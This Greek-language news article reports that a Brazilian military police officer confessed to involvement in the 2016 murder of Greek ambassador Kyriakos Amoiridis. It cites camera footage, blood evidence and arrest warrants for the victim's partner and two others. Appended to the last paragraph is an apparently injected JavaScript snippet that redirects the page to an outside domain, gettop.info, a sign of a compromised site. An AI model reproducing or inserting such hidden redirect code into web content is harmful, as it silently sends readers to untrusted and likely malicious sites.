Ομολόγησε ο εραστής της συζύγου του πρέσβη

0
10

 

Έσπασε και ομολόγησε την ενοχή του για συμμετοχή στη δολοφονία του Έλληνα πρέσβη στη Βραζιλία Κυριάκου Αμοιρίδη ο φερόμενος ως εραστής της επί 15ετίας συντρόφου του θύματος, τη Βραζιλιάνα Φρανσουάζ, αξιωματικός της Αστυνομίας Στρατού Sérgio Gomes Moreira Filho.

Ο άντρας φέρεται να αναγκάστηκε να παραδεχθεί ότι εμπλέκεται στο έγκλημα όταν οι αστυνομικοί του έδειξαν βίντεο από την κάμερα έξω από το σπίτι του πρέσβη, όπου φαίνεται να τραβάει κάτι σαν πτώμα μέχρι ένα αυτοκίνητο.
Σύμφωνα με πληροφορίες, το υλικό από τις κάμερες έξω από το εξοχικό όπου ο πρέσβης έκανε διακοπές βοηθάει να συναρμολογηθεί το παζλ για την υπόθεση δολοφονίας.

Ένα από τα στοιχεία που βοήθησαν την αστυνομία να ξεμπλέξει το κουβάρι της υπόθεσης ήταν οι κηλίδες αίματος που βρέθηκαν στον καναπέ στο σπίτι όπου ζούσε το ζευγάρι. Από εκεί κατάλαβαν ότι ο Κυριάκος Αμοιρίδης δολοφονήθηκε μέσα στο σπίτι και στη συνέχεια μεταφέρθηκε στο αυτοκίνητο όπου και απανθρακώθηκε. Από τις κηλίδες συνάγεται το συμπέρασμα ότι ο πρέσβης μαχαιρώθηκε μέχρι θανάτου.

Τις επόμενες ώρες αναμένεται το πόρισμα των ιατροδικαστών που θα ρίξει φως στις συνθήκες θανατου του Έλληνα πρέσβη.

Ο εραστής αστυνομικός αρχικά αρνούνταν κάθε συμμετοχή, όταν όμως του έδειξαν ότι έχουν καταγραφεί όλα σε κάμερα, έσπασε.

Ενταλμα σύλληψης υπάρχει επίσης για τη Φρανσουάζ, αλλά και για άλλα δύο άτομα, των οποίων η εμπλοκή δεν έχει προς το παρόν διασαφηνιστεί. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here